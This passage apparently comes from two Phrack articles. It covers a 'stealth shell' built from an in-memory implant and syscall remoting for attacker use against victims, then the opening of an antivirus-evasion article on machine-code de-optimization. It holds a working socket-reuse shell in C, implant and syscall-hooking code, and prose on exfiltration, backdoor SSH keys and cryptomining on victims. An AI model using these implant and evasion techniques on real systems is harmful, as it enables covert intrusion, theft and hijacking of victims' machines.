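inherited descriptors; a crude sketch (a real payload would typically
match the peer address rather than grab the first socket it finds):
```c
#include <unistd.h>
#include <sys/stat.h>

int main(void) {
    /* probe inherited descriptors for a socket to reuse */
    for (int fd = 3; fd < 1024; fd++) {
        struct stat st;
        if (fstat(fd, &st) == 0 && S_ISSOCK(st.st_mode)) {
            dup2(fd, 0); dup2(fd, 1); dup2(fd, 2);
            execl("/bin/sh", "sh", (char *)NULL);
        }
    }
    return 1;
}
```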
Yet another approach involves writing an exploit that launches an implant
– a bit of software that exists only to receive and perform commands
over a network socket – as well as building a custom interactive prompt
that accepts commands from us locally (which we send over the network to
the implant). This approach avoids running a shell on the victim's
infrastructure, but is cumbersome and requires anticipating which
commands we might need ahead of time.
Why do attackers use remote shells?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
I am making the generous assumption that Phrack's audience still consists
of offense-minded folks – i.e., "attackers" – rather than middle-aged
exploit authors who sold out to enrich venture capitalists. So, when I
say, "we," assume our jolly group includes attack-oriented programmers.
When we exploit a vulnerability in a target system, remote shells allow us
to interact with the victim's system and spare us from pre-emptively
defining exactly which tasks we want to perform (when we don't even know
much about the system). For this reason, we often spawn shells during the
exploitation phase of our operations. Interactive prompts make us more
nimble; if we realize we need to do something we hadn't anticipated, we
aren't forced to re-exploit the system with a new payload (which is both
annoying and possibly expensive).
Just as legitimate system administrators often need to log into their
systems and explore them interactively, we will need to explore the
systems under our purview interactively as surprise system administrators.
The disparate hemispheres in traditional shells
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Classic connectback or socket reuse shells only give us access to whatever
packages and tools are on the victim's machine already, in whatever
configuration that system's operator decided. Custom interactive prompts
that communicate with a hand-crafted implant are brittle and make us
reinvent an interactive environment from scratch.
Like most people of software, I heavily customize my environment and do
not like the interactive prompts available for Windows. I am also a lazy
attacker. I refuse the indignity of Powershell and cling to the Linux
utilities burned into my brain, so much so that I descended into a
labyrinthian rabbit hole and traversed the bowels of Linux, macOS, and
Windows for an unreasonable hoard of hours to create my own toolchain and
indulge my persnickety laziness.
You deserve a more civilized attack workflow, too. Let's discuss this
extravagant contraption in detail.
Stealth Shell
~~~~~~~~~~~~~
Stealth shell tooling simplifies how we interact with remote victim
systems while muffling any side effects to elude discovery by defenders.
It not only improves the interactive experience of remote shells, but
veils their activity like custom in-memory exploits (without the
inconvenience of a custom non-standard interactive environment or worse,
being limited to the preordained shellcode we crafted during the
operation's initial stages).
What qualities constitute a tool capable of creating stealth shells? There
are three key criteria a tool must satisfy:
1. Unify the computational resources of multiple machines as if they were
one system
2. Expose access to this system via a standard shell interface that can
run arbitrary programs
3. Hide execution inside an in-memory implant to avoid detection
How does this innovate beyond existing commercial tools like Immunity
Canvas and Core Impact? Those are proprietary tools you have to buy,
each with its own walled ecosystem; any extensions you build are locked
into that ecosystem. They also do nothing to unify multiple machines
under a single illusion; they force you to talk to the remote machine
explicitly using their proprietary commands and APIs.
A stealth shell is special because the way you interact with it is not
special. It reifies a regular Linux shell so we can use standard UNIX
tools to puppeteer our target machines. This simplifies our workflow to:
1. Discover vulnerable target service
2. Exploit the target service (bring your own vulnerability),
instantiating the stealth shell implant
3. Interact with the target system as if it were local using the virtual
stealth shell:
~* Finding their cyberinsurance policy is as simple as grep; *~
~* Copying the victim's files is as simple as running cp; *~
~* Querying their databases is as simple as running psql; *~
~* Adding a backdoor ssh key is as simple as writing to the target's
.ssh/authorized_keys file; *~
~* Fetching data from other services is as simple as running curl; *~
~* Imaging their disk is as simple as dd; *~
~* Exfiltrating data is as simple as rsync; *~
~* Computing SHA256 hashes using their CPU is as simple as running
xmrig; *~
A stealth shell can access all the packages installed on our machine. It
respects our local configuration, line discipline, and window sizing. We
can use our favorite scripting languages to automate operations against
the victim's machine rather than gluing random snippets of shellcode
together by hand.
At the highest level, the stealth shell collection of tools contains a
fully virtualized attack toolchain. The tools virtualize the filesystem,
network, and compute resources of both the remote victim system and our
local system, transmogrifying these disparate hemispheres into a unified,
distributed Linux machine at our disposal.
This unified, distributed Linux machine lives in the initial shell process
and any subsequent subprocesses we spawn when interacting with the shell.
We can execute these subprocesses locally or embed them on our victim's
machine via the implant; stealth shells bequeath us equal access to files
and network connections on either hemisphere of the distributed system
(i.e. both our machine as an attacker and our target / victim machine).
System call remoting with an implant
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
How is it possible for us to command both our system and our victim's as
if they were one distributed Linux machine? We employ the age-old
technique of system call remoting (publicized and later commercialized by
CORE). On whatever machine we're using to mount our attack operation, we
run programs locally but proxy our commands over the network to the target
(victim) machines so our implant executes them instead.
This makes an implant the first critical ingredient we need for syscall
remoting. A stealth shell's implant is lightweight, performing only a few
necessary behaviors. On start, the implant searches for the incoming
socket (the one that triggered the exploit). It next reuses that socket
and sends a hello message to us (on our local machine) indicating the
exploit succeeded. The implant then attentively listens (in a loop) for
when we send it commands to perform.
Stealth shell's implant accepts the following commands:
1. Perform a syscall and report the result back
2. Call a function and report the result back
3. Peek at a range of memory and report the bytes back
4. Poke at a range of memory, writing a specific sequence of bytes into it
Stealth shell uses these commands to perform operations on our behalf.
Let's say we type `stat /target/etc/passwd` into the stealth shell on our
local machine. On the remote victim machine, the implant performs a
newfstatat(AT_FDCWD, "/etc/passwd", ..., AT_SYMLINK_NOFOLLOW) syscall and
dutifully reports back that yes, it did find a passwd file and shows us
the file's attributes.
Similarly, let's say we type `cat /target/etc/passwd` into the stealth
shell. This will have the implant perform openat(AT_FDCWD, "/etc/passwd",
O_RDONLY) followed by a series of read syscalls on the resulting remote
file descriptor. cat will then print the contents of the remote file to
the terminal.
This is all the support we need from the implant to drive a stealth
shell via syscall remoting.
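To make the first command concrete, here is a sketch of the implant's
core loop. The wire format below is invented purely for illustration;
the article does not specify the real message layout:
```c
#include <stdint.h>
#include <unistd.h>
#include <sys/syscall.h>

/* hypothetical wire format, for illustration only */
struct msg {
    uint32_t op;       /* 1 = syscall, 2 = call, 3 = peek, 4 = poke */
    uint64_t num;      /* syscall number */
    uint64_t args[6];  /* syscall arguments */
};

static void implant_loop(int sock) {
    struct msg m;
    while (read(sock, &m, sizeof(m)) == sizeof(m)) {
        if (m.op == 1) {
            /* perform the requested syscall... */
            long ret = syscall(m.num, m.args[0], m.args[1], m.args[2],
                               m.args[3], m.args[4], m.args[5]);
            /* ...and report the result back */
            write(sock, &ret, sizeof(ret));
        }
        /* call/peek/poke handling omitted for brevity */
    }
}
```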
Intercepting local syscall operations
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Great! We exploited a given target, then installed the implant that reuses
the victim socket and listens for commands to perform on the (remote)
victim machine. But how do we interact with the victim's remote machine as
if it were our local machine? How can we ensure the commands we enter on
our local machine execute on our victim's remote machine? We need
something that can tell the implant what to do based on what we type into
our local shell. Specifically, we need a component on our machine that
intercepts local syscall requests and instead sends them over the network
for the implant to execute on the victim's system.
To understand how syscall interception works, let's start with "typical"
syscall behavior. How do syscalls normally work when we aren't
manipulating them for crimes, espionage, or escapades? When a process
performs a syscall, the operating system wakes up and its kernel figures
out what operation is associated with the syscall. The kernel performs
the operation on the process and then resumes executing the program.
The program continues doing work, relying on the operation it asked the
kernel to perform.
If we can somehow direct the kernel to hand control over to us, we can
replace the behavior of the operating system with behaviors of our own.
Enter axon, the monitor component that intercepts syscalls in my
implementation of stealth shell. When the kernel receives a syscall from
a process, rather than determining and executing the appropriate
operation, it instead switches to axon and tells it (roughly), "hey, the
program asked me to perform this syscall operation, but you told me to
deliver these requests to you, so now it's your responsibility and I'm not
going to do anything more with the syscall." axon is now the anointed
entity that figures out what to do and when to resume the program.
How do we, the attacker, interact with axon? When we try to interact with
a remote resource via a program we're running in the shell (say, for
example, `cat /target/etc/passwd`), doing whatever we want to do, axon
interrupts the shell, packages the program's request (in this case,
open "/etc/passwd") into a message, sends the message to the implant, and
waits for the implant's response. Once it receives the implant's response
(like "hello here is a file descriptor number representing the file you
asked me to open"), axon resumes our shell – and our shell then continues
with the next step of the program (like cat, which will immediately try to
read the bytes in the file).
Let's inspect each of these steps to see how axon makes this happen.
axon waits on our host (i.e. our local machine) for the implant's hello
message. When it receives the hello message, axon knows the exploit
succeeded and the implant is ready to receive commands. axon spawns a
subprocess and asks the kernel to deliver all syscall attempts from the
subprocess to axon. Inside the local subprocess, it execs bash, which will
become our running stealth shell. bash begins its normal startup process,
executing as intended… until it tries to perform a syscall.
This (local) bash process tries to perform a syscall operation by sending
its request to the local kernel – but the kernel instead is like, "hold up,
I gotta hand this over to my new bff axon so they can figure out what to
do with it."
In more technical terms, the kernel traps bash's attempt to perform a
syscall operation and delivers the trap to axon as a signal. axon examines
the syscall request described in the signal and inspects its arguments to
decide how to process the syscall.
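The article doesn't pin the trap mechanism down, so treat the following
as just one way to get this behavior on Linux: a minimal ptrace-based
supervisor that stops a child at every syscall boundary and gets to
inspect (and potentially rewrite) the request:
```c
#include <stdio.h>
#include <unistd.h>
#include <sys/ptrace.h>
#include <sys/user.h>
#include <sys/wait.h>

int main(void) {
    pid_t child = fork();
    if (child == 0) {
        /* ask to be traced, then become the target program */
        ptrace(PTRACE_TRACEME, 0, NULL, NULL);
        execl("/bin/true", "true", (char *)NULL);
        _exit(1);
    }
    int status;
    waitpid(child, &status, 0);  /* initial stop after execve */
    while (1) {
        /* run the child until the next syscall entry or exit */
        ptrace(PTRACE_SYSCALL, child, NULL, NULL);
        waitpid(child, &status, 0);
        if (WIFEXITED(status)) break;
        struct user_regs_struct regs;
        ptrace(PTRACE_GETREGS, child, NULL, &regs);
        /* orig_rax = syscall number; rdi/rsi/rdx/r10/r8/r9 = args */
        fprintf(stderr, "syscall %lld\n", (long long)regs.orig_rax);
    }
    return 0;
}
```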
If the syscall references a path, file descriptor, or network address,
axon must select whether it's a local or remote operation – that is,
whether the implant on the remote victim machine should perform the
operation or if our local machine should instead. The syscall request
itself indicates when commands should be performed on the target (i.e.
remote victim machine) by one of:
1. A path beginning with the /target/ prefix
2. A relative path referencing files out of /target
3. A network address in the virtual target address range
4. A file descriptor the shell process previously opened against a remote
path or network address
We can therefore think of axon as a syscall dispatcher. It examines the
incoming syscalls and, based on their arguments, appropriately routes them
to the host bearing the associated resource.
For example, if we run `stat /etc/hostname`, axon determines that
/etc/hostname is a local path and performs our stat operation locally.
If instead we run `stat /target/etc/passwd`, axon determines that
/target/etc/passwd is a remote path and runs a stat /etc/passwd operation
remotely by asking the implant to perform the operation on our behalf.
This orchestration powers our distributed system.
Let's go a layer deeper, starting with local operations (since that
reflects the simpler path axon can take). If the syscall request doesn't
have any of the indicators of a remote resource described above, axon
calls back into the kernel and requests the exact same syscall operation
the subprocess initially requested. When the syscall completes, axon
delivers the results to the subprocess and resumes the subprocess's
execution. In replaying the syscall request it received, axon behaves as
a "manipulator in the middle" between the running shell process and our
local kernel.
What if we ask the shell to interact by specifying one of the "plz perform
on the victim machine" indicators? For remote operations, axon translates
the resulting syscall operation to the equivalent command the implant
should execute on the target – and respects compatibility with the
target's operating system (like translating a Linux open syscall to
a Windows CreateFile call). axon then serializes this
translated command into a sequence of bytes representing it, sends the
serialized bytes over the network socket (the socket shared with the
implant), and waits for the implant to send a response indicating it
executed the command.
axon's message wakes the remote implant running on our target (it rests in
an idle state while awaiting our signal to perform some remote
operations). The implant accepts axon's serialized bytes, deserializes our
command into a local buffer, and performs axon's requested syscall. When
the syscall completes, the implant serializes the result – including any
mutated data – into a sequence of bytes representing it. It then sends
these serialized bytes back over the network as a response to axon, before
waiting for further commands to perform.
Upon receipt, axon first deserializes the response into its constituent
components; for example, a response to a read request will include the
status of the read syscall, as well as whatever bytes the implant read.
Then axon writes any updated data into the subprocess' address space and
resumes the bash subprocess, awaiting our additional commands (i.e.
syscall requests).
With axon dispatching our commands across the network and the remote
implant executing them on the victim's machine, we've covered the basics
of syscall remoting. To summarize, we can manipulate the target's file and
disk as if they were local files via syscall interception and the implant.
We can remotely puppeteer the victim's system using our local (Linux)
processes. (In practice, we are subject to many fiddly details since axon
must coordinate the simultaneous execution of multiple subprocesses that
each possess distinct emulated file descriptor tables.)
We can now treat the remote (victim) system like it's part of our local
system; we can restore our dignity when targeting Windows or macOS
machines by automagically translating our Linux commands into these
foreign tongues. Is that enough? To reasonable people, yes. But we are
not reasonable people, are we? We need to treat *both* sides as a unified
distributed system to realize the more civilized world of Linux everything
everywhere all at once.
Let's now discuss how a stealth shell does just that.
ti esrever dna ti pilf nwod gnaht ym tup I
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This section has the same basic goals as the prior section and shares much
of the same approach, but runs it backwards and is more extra. Why would
we do this? Because sometimes we want to do crimes on the victim's machine
but do the not-crimes on our local machine, like loading libraries or
writing log messages to our local disk. The more we can do stuff on our
local machine, the more we slink past the defender's gaze.
Consider a crime like cryptomining on the victim's machine. We could:
1. adjust xmrig to be in a big block of shellcode containing all of its
libraries and configuration
2. turn off all its logging
3. have it proxy its network activity through the socket connecting the
victim and us
4. and mask off any other feature that might lead to our discovery
That is a lot of fiddly, manual work and it would be disastrously easy to
slip up – like letting it write files onto the victim's disk, trying to
activate a GPU the victim doesn't have, or making bitcoin network requests
that the victim's security stack should trivially detect. Remember, we are
engineers. Like any decent engineer, we should spare ourselves this
tedious labor by wormholing into building tools to handle it
automatically instead. And that's precisely what I did.
How can we transplant some of the target operations back to our local
machine to suppress noisy side effects? A stealth shell takes the same
mechanism that remotes syscalls and applies it in reverse, executing
programs inside the remote implant. We call these embedded running
programs "picoprocesses" because they're regular Linux programs that each
think they're running as a Linux process, when actually they're embedded
in the implant running inside another process. These picoprocesses even
think they are regular Linux processes when they're running on Windows
or macOS.
Are these real processes? What is real? To them they are.
How can picoprocesses be real if our eyes aren't real?
texec is our stealth shell's mechanism for executing entire programs
remotely on the victim's computer (loading them inside the implant);
texec is short for "target exec" because it execs a program on the
target. To picoprocesses, the previous rules about what is local and what
is remote are flipped – paths prefixed with /target/ reference local
files, with any remaining paths referencing remote files living on our
system. This lets programs running as picoprocesses send commands back to
our local system so texec (which runs locally on our machine) can
perform them.
Note that this also means the target could manipulate our machine if they
discover our presence in their systems. In the spirit of Secure by Design,
stealth shell makes you opt in by prefixing your commands with our helper
program `texec`. (The reference implementation also does some things not
described here to detect and limit the effects of target tampering; we
recommend carrying out your operations from heavily sandboxed
environments).
But that addressable hazard aside, it's just as straightforward for us to
run the same syscall interception activities with the roles reversed. Let's
explore how.
Offloading syscalls with texec
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
How do we intercept syscalls the picoprocess performs without alerting
defenders (or, more realistically, SREs) to our presence? To remain
concealed, the implant shouldn't launch new processes and shouldn't
perform bizarre operations the exploited program wouldn't perform, like
attaching a seccomp trap, ptracing a peer thread, or opening /dev/kvm.
These options aren't available when the target is Windows or macOS anyway.
Prepare for a journey, because performing these functions under such a
restrictive regime requires rather lavish resourcefulness.
With axon, we intercepted syscall events by asking the OS to deliver them
to us rather than letting the kernel execute them by default; we
automatically routed syscalls referencing /target to the implant on the
victim machine (to execute remotely) and let axon handle the other
syscalls on our machine (to execute locally).
texec takes a different approach to syscall interception: texec creates a
virtual remote process by puppeteering the implant into creating and
subsequently executing a Linux program inside the implant's address space
as a picoprocess. texec analyzes programs just-in-time as we request them
and replaces any syscall instructions with a jump to its own handler that
emulates the syscall. In contrast to axon, texec sends any syscalls
referencing /target to the implant (to execute *locally*) and the rest to
texec running on our machine (to execute *remotely*).
Let's tease out this trick, starting with the initial stages of remote
program execution.
texec begins by mapping a small runtime into the target's address space.
It requests the implant call mmap or VirtualAllocEx to reserve some memory
for the runtime and pokes the runtime's contents into memory. The runtime
includes all the facilities texec needs to receive syscall requests,
dispatch syscalls remotely to the attacker's host (a reversal of axon's
role), dispatch them locally on the victim's machine, and manage a virtual
file descriptor table.
With the runtime mapped into the victim process' memory, texec proceeds to
the next phase: running our naughty program of choice inside the implant.
For example, if we enter `texec /bin/xmrig`, we want texec to run the
xmrig binary on the target so we can convert the victim's computational
resources into coins. texec first resolves and maps the main binary into
local memory, then pokes it into remote memory by calling mmap or
VirtualAllocEx again. If the main binary requires an ELF interpreter,
as most do, texec maps the interpreter into memory, too.
Once texec loads our binaries in local memory and in the remote implant,
it just-in-time analyzes the local copy of the binaries' .text sections
for syscall instructions. x86_64 systems represent syscall instructions
with the two-byte "0f 05" sequence. For each syscall instruction texec
encounters, it prepares a detours-style patch by analyzing the
nearby instructions and relocating enough of them to insert
a jmp (e9 xx xx xx xx) instruction.
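A first pass over the bytes is trivial to sketch; note that real
tooling must disassemble properly, since "0f 05" can also appear inside
immediates and displacements (hence the just-in-time analysis):
```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* naive scan of a .text image for syscall (0f 05) candidates */
static void find_syscalls(const uint8_t *text, size_t len) {
    for (size_t i = 0; i + 1 < len; i++)
        if (text[i] == 0x0f && text[i + 1] == 0x05)
            printf("syscall candidate at offset 0x%zx\n", i);
}
```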
texec replaces (i.e. "patches") each relocated syscall instruction with a
jump to a trampoline containing:
1. relocated instructions from before the original syscall instruction
2. instructions that spill and restore the syscall arguments
3. a call into the runtime texec mapped earlier
4. any relocated instructions from after the original syscall instruction
5. and a jump back to the original instruction sequence.
Here's the stencil for the trampoline:
```
# relocated prefix instructions
{relocated_prefix}
# save syscall number
mov %rax, %r11
# save flags
lahf
seto %al
# skip red zone
sub $128, %rsp
# spill registers to stack
push %rax
push %r9
push %r8
push %r10
push %rdx
push %rsi
push %rdi
push %r11
# move address of spilled registers into first arg
mov %rsp, %rdi
# call the runtime's syscall handler
movabs ${runtime handler address}, %rcx
call *%rcx
# restore registers from stack
pop %rcx
pop %rdi
pop %rsi
pop %rdx
pop %r10
pop %r8
pop %r9
pop %rax
# restore previous stack
add $128, %rsp
# restore flags (seto stored OF in %al; 0x7f + 1 overflows to set OF)
add $0x7f, %al
sahf
# move result into rax
mov %rcx, %rax
# relocated suffix instructions
{relocated_suffix}
# resume patched function
jmp {resume_address}
```
Once texec prepares all the patches for the program's syscall
instructions, it remotely pokes each patch into place via the implant.
It also must correct each segment's memory protection so the victim's
system will allow the instructions to execute on the victim's CPU; for
the parts of the picoprocess that contain instructions, texec marks them
as executable.
With that final step of poking patches into memory (and ensuring the
patched instructions can execute), we've tampered with the binary,
replacing its syscall instructions with jumps to trampolines. But we still
need to launch the picoprocess to achieve the dream of running a Linux
program inside the implant.
For these last few steps before the picoprocess launches, texec constructs
a main thread stack for the picoprocess by commanding the implant call
mmap or CreateThread.
To match what the Linux kernel would do when executing a new program,
the stack needs the arguments and environment variables to launch the
picoprocess with, plus the kernel-provided values of the System V (ELF)
auxiliary vector. texec crafts this initial stack image mimicking what a
real Linux kernel would produce when executing a program, and pokes
it into the remote stack it just created.
The last step before launch has texec command the implant to perform a
clone syscall or call ResumeThread to start executing the remotely loaded
program. The picoprocess now runs in the implant as an embedded thread.
Anyone examining the target system in ps, top, or Task Manager would only
see an additional thread on the existing process – no suspicious
subprocesses, binaries on disk, or program names. texec then waits for
commands from the remote picoprocess (running on the victim's machine),
just as the implant awaits our local commands.
Meanwhile, the picoprocess runs inside of the implant as a dedicated
thread, executing until it reaches its first patched (i.e. replaced)
syscall instruction. Remember, we tampered with the syscall instructions
so the picoprocess jumps to texec's handler instead. This means that,
instead of attempting a syscall, the picoprocess jumps to the designated
trampoline and calls the runtime's syscall handler to process what would
have been a syscall operation. The runtime determines whether to emulate
the program's syscall request locally or perform it remotely (on our
machine); for remote operations it serializes the syscall's arguments and
sends them across the network to the texec process waiting on our machine
– similar to what axon performs in the other direction.
The runtime's message wakes the texec running on our machine (it rests
in an idle state while awaiting our signal to perform some remote
operations). texec accepts the runtime's serialized bytes, deserializes
the command into a local buffer, and performs the runtime's requested
syscall. When the syscall completes, texec serializes the result –
including any mutated data – into a network representation. It then sends
this serialized representation back over the network as a response to the
runtime before waiting for further commands to perform.
Upon receipt, the runtime first deserializes the response into its
constituent components; for example, a response to a read request will
include the status of the read syscall, as well as whatever bytes
texec read. Then the runtime writes any updated data into the
picoprocess's address space and returns into the trampoline to resume the
picoprocess, awaiting its additional commands (i.e. syscall requests).
This may sound familiar — it's the exact series of events as earlier
when we discussed axon, but reversing the direction of traffic across the
network socket.
Now that texec can load programs remotely and process their syscall
requests, we can run programs and access either side's data on both
"hemispheres" of our unified distributed system. With the implant + axon +
texec + texec's runtime, we can access our local and our victim's remote
resources and command them as we please. We have one distributed system
spread across a network, hidden from the victim system's operator.
Multi-platform support
~~~~~~~~~~~~~~~~~~~~~~
We've definitely skimmed over multi-OS support as if it were trivial until
this point. As foreshadowed, we must translate Linux syscalls into the
remote system's OS interface if we want to target multiple operating
systems. Executives don't seem to care about hacks unless they're on a
machine they use – which is almost always Windows – so our tooling doesn't
suffice until we support the big three.
What do we need to support each major OS?
Linux targets are straightforward: the target shares the same syscall
interface, though potentially an older version with fewer features.
Enterprises tend to run older LTS systems. The only hazard we face is
copying input and output data correctly.
macOS targets have many syscalls similar to Linux, albeit with different
numeric IDs and calling conventions. Some Linux syscalls, however, have
different data layouts in their macOS equivalent or are simply
unavailable. To remotely perform a macOS syscall, a stealth shell must
translate between the two ABIs.
For Windows targets, the entire API is different; the design distinctly
differs from UNIX operating systems. CreateFile is similar to open,
and the HANDLEs it produces can be thought of as file descriptors by
another name, but all the other syscalls stymie direct translation.
If you want to extend stealth shell support to Windows targets, be
prepared to invest heavily into your Windows translation layer. It took
me a hundred or so hours as a humble software engineer, so surely your
leet attack team can build it without sacrificing their sanity in the
pursuit of perfection. Perhaps read the Cygwin source for inspiration.
Conclusion
~~~~~~~~~~
Stealth shells make remote interactive shells even more flexible while
remaining as perniciously sneaky as custom in-memory exploits. There is
no tradeoff: we can be both quiet and nimble. The approach extends the
practice of
syscall remoting so we can enjoy the comfort and familiarity of the Linux
ecosystem while maximizing pwnage possibilities on target systems,
regardless of OS.
Our stealth shell uses an implant and two interrelated syscall
dispatchers – axon and texec – to interrupt syscalls and redirect them
for execution on the appropriate resource (either the victim's machine or
our own). axon coordinates and dispatches the syscall activity of a tree
of subprocesses, bridging two systems together into one interactive
environment and minimizing side effects on the victim's system. texec
instantiates and coordinates the activity of a remote picoprocess,
converting regular Linux programs into spooky execution at a distance.
Stealth shells are just as cloaked to defenders as vastly more cumbersome
custom in-memory exploits (and are certainly as sneaky as prior syscall
remoting approaches). If a hyperfocused SRE can detect an in-memory
implant, they can detect stealth shell's in-memory implant. If they can
detect an in-memory implant loading new/more code, they can detect texec
loading a picoprocess.
With that said, we can layer a stealth shell with other evasive
techniques – such as tunneling through DNS, reusing an existing socket,
and, with additional effort, mimicking an existing protocol like HTTP.
We will leave that as an exercise for the reader.
Exploits get most of the hype, but toolchains and workflows are what make
or break real attack operations. Plus, we deserve civilized workflows that
don't require us to cosplay as a Windows sysadmin. I hope this inspires
other
obsessive systems nerds to brainstorm what other tools need a refresh to
ferry them into the modern ops era.
~~~~~~~~~~~~~~~~
Greetz and the deepest thanks to &void; who pushed me to publish this
paper and employed their writing wizardry to make it readable.
==================================================
==Phrack Inc.==
Volume 0x10, Issue 0x47, Phile #0x0F of 0x11
|=-----------------------------------------------------------------------=|
|=------------------=[ Evasion by De-optimization ]=---------------------=|
|=-----------------------------------------------------------------------=|
|=---------------------------=[ Ege BALCI ]=-----------------------------=|
|=-----------------------------------------------------------------------=|
--[ Table of Contents
1 - Intro
2 - Current A.V. Evasion Challenges
3 - Prior Work
4 - Transforming Machine Code
5 - Transform Gadgets
5.1 - Arithmetic Partitioning
5.2 - Logical Inverse
5.3 - Logical Partitioning
5.4 - Offset Mutation
5.5 - Register Swapping
6 - Address Realignments
7 - Known Limitations
8 - Conclusion
9 - References
--[ 1 - Intro
Bypassing security products is a very important part of many offensive
security engagements. The majority of the current AV evasion techniques
used in various evasion tools, such as packers, encoders, and obfuscators,
are heavily dependent on the use of self-modifying code running on RWE
memory regions. Considering the current state of security products, such
evasion attempts are easily detected by memory analysis tools such as
Moneta[1] and Pe-sieve[2]. This study introduces a new approach to code
obfuscation with the use of machine code de-optimization.
In this study, we will delve into how we can use certain mathematical
approaches, such as arithmetic partitioning, logical inverse, polynomial
transformation, and logical partitioning, to design a generic formula
that can be applied to many machine code instructions for transforming,
mutating, or de-optimizing the bytes of the target program without
creating any recognizable patterns. Another objective of this study is
to give a step-by-step guide for implementing a machine code de-optimizer
tool that uses these methods to bypass pattern-based detection.
Such a tool has already been implemented, and will be shared[3] as an
open-source project with references to this article.
--[ 2 - Current A.V. Evasion Challenges
The term "security product" represents a wide variety of software
nowadays. The inner workings of such software may differ, but the main
purpose is always to detect some type of malicious asset by recognizing
certain patterns. Such indicators can originate from a piece of code,
data, a behavior log, or even from the entropy of the program. The main
goal of this study is to introduce a new way of obfuscating malicious
code. So, we will only focus on evading malicious CODE patterns.
Arguably, the most popular way of hiding malicious code is by using
encoders. Encoding a piece of machine code can be considered the most
primitive way of eliminating malicious code patterns. Because of the
current security standards, most encoders are not very effective at
bypassing security products on their own. Instead, they're being used
in more complex evasion software such as packers, crypters, obfuscators,
command-and-control, and exploitation frameworks. Most encoders work by
encoding the malicious code by applying some arithmetic or logical
operations to the bytes. After such transformation, encoder software
needs to add a decoding routine at the beginning of the encoded payload
to fix the bytes before executing the actual malicious code.
                   +-----------+
                   |  decoder  | <--- Decodes the original payload.
+-----------+      +-----------+
|           |      |           |
| malicious |      |           |
|   code    | ===> | enc-code  |
|           |      |           |
|           |      |           |
+-----------+      +-----------+
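As a minimal illustration of the concept (not any particular encoder),
a single-byte XOR encoder and its matching decode step are the very same
loop, which is exactly why a decoder stub must travel with the payload:

static void xor_code(unsigned char *buf, unsigned long len,
                     unsigned char key)
{
    /* XOR is self-inverse: run once to encode, again to decode */
    for (unsigned long i = 0; i < len; i++)
        buf[i] ^= key;
}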
There are three critical issues with this approach. The first issue is
the effectiveness of the encoding algorithm. If the malicious code is
being encoded by just a single byte of logical/arithmetic operation, the
security products can also detect the encoded form of the malicious
code.[4] In order to make the malicious code unrecognizable, the encoder
needs to use more complex encoding algorithms, such as primitive
cryptographic ciphers or at least multi-byte encoding schemes.
Naturally, such complex encoding algorithms require larger decoder
routines. This brings us to the second critical issue, which is the
visibility of the decoder routine. Most security products can easily
detect the existence of such code at the beginning of an encoded blob by
using static detection rules[5]. There is some new-generation encoder
software that tries to obfuscate and hide the decoder code by also
encoding the decoder routine, reducing its size, and obfuscating it
with garbage instructions.[6] Such designs produce promising results,
but they do not solve the final and most crucial issue.
In the end, all of the encoder software produces a piece of self-modifying
code. This means the resulting payload must be running inside a
Read-Write-Execute (RWE) memory region. Such a scenario can easily be
considered a suspicious indicator.
--[ 3 - Prior Work
To solve the aforementioned issues, security researchers created several
machine code obfuscators.[7][8] The purpose of these obfuscators is to
transform certain machine code instructions with certain rules for
bypassing security products without the need for self-modifying code.
These obfuscators analyze the instructions of the given binary and mutate
them to some other instruction(s). The following lines contain a simple
example. The original instruction loads the 0xDEAD value into the RCX
register;
lea rcx, [0xDEAD] ------+-> lea rcx, [1CE54]
                        +-> sub rcx, EFA7
The obfuscator program creates the above instruction sequence. After
executing two of the newly generated instructions, the resulting value
inside RCX will be the same. The assembled bytes of the newly generated
sequence are different enough to bypass static detection rules. But there
is one problem here. The final SUB instruction of the generated sequence
modifies the condition flags.
Depending on the code, this could affect the control flow of the program.
To avoid such conditions, these obfuscator programs also add save/restore
instructions to the generated sequence to preserve all the register values
including the condition flags. So, the final output of the program will be;
pushf ; --------------> Save condition flags to stack.
lea rcx, [1CE54]
sub rcx, EFA7
popf ; --------------> Restore condition flags from the stack.
If you analyze the final instruction sequence, you will realize that such
an order of instructions is very uncommon, and wouldn't be generated from
a compiler under normal circumstances. It means that this method of
obfuscating instructions can be detected by security products with static
detection rules for these techniques.
The following simple Yara rule can be used for detecting all the
sequences generated by the LEA transform gadget of the Alcatraz
binary obfuscator.
rule Alcatraz_LEA_Transform {
strings:
// pushf > 66 9c
// lea ?, [?] > 48 8d ?? ?? ?? ?? ??
// sub ?, ? > 48 81 ?? ?? ?? ?? ??
// popf > 66 9d
$lea_transform = { 66 9c 48 8d ?? ?? ?? ?? ?? 48 81 ?? ?? ?? ?? ?? 66 9d }
condition:
$lea_transform
}
This rule can easily be used by security products because it has a very
low false-positive rate due to the unusual order of the generated
instruction sequence. Another shortcoming of currently available machine
code obfuscators is using specific transform logic for specific
instructions. There are around 1503 instructions available for the
current Intel x86 instruction set. Designing specific transform gadgets
for each of these instructions can be considered challenging and
time-consuming. One of the main goals of this study is to create
math-based generic algorithms that can be applied to many instructions
at once.
--[ 4 - Transforming Machine Code
To effectively transform x86 machine code, we need a deep understanding
of x86 architecture and the instruction set. In the x86 architecture,
instructions can take up to five operands. We can divide the types of
operands into three main categories. An operand can either be a register,
immediate, or memory. These operand types have their subcategories, but
for the sake of simplicity, we can skip this for now.
Depending on the mnemonic, an x86 instruction can have all the
combinations of the mentioned operand types. As such, there are many ways
to transform x86 instructions. All the compiler toolchains do this all the
time during the optimization phase[9].
These optimizations can be as complex as reducing a long loop condition
to a brief branch operation or re-encoding a single instruction to a much
shorter sequence of bytes, effectively making the program smaller and
faster. The following example shows that there are multiple ways to encode
certain instructions in x86 architecture.
add al,10h --------------------> \x04\x10
add al,10h --------------------> \x80\xC0\x10
adc al,0DCh -------------------> \x14\xDC
adc al,0DCh -------------------> \x80\xD0\xDC
sub al,0A0h -------------------> \x2C\xA0
sub al,0A0h -------------------> \x80\xE8\xA0
sub eax,19930520h -------------> \x2D\x20\x05\x93\x19
sub eax,19930520h -------------> \x81\xE8\x20\x05\x93\x19
sbb al,0Ch --------------------> \x1C\x0C
sbb al,0Ch --------------------> \x80\xD8\x0C
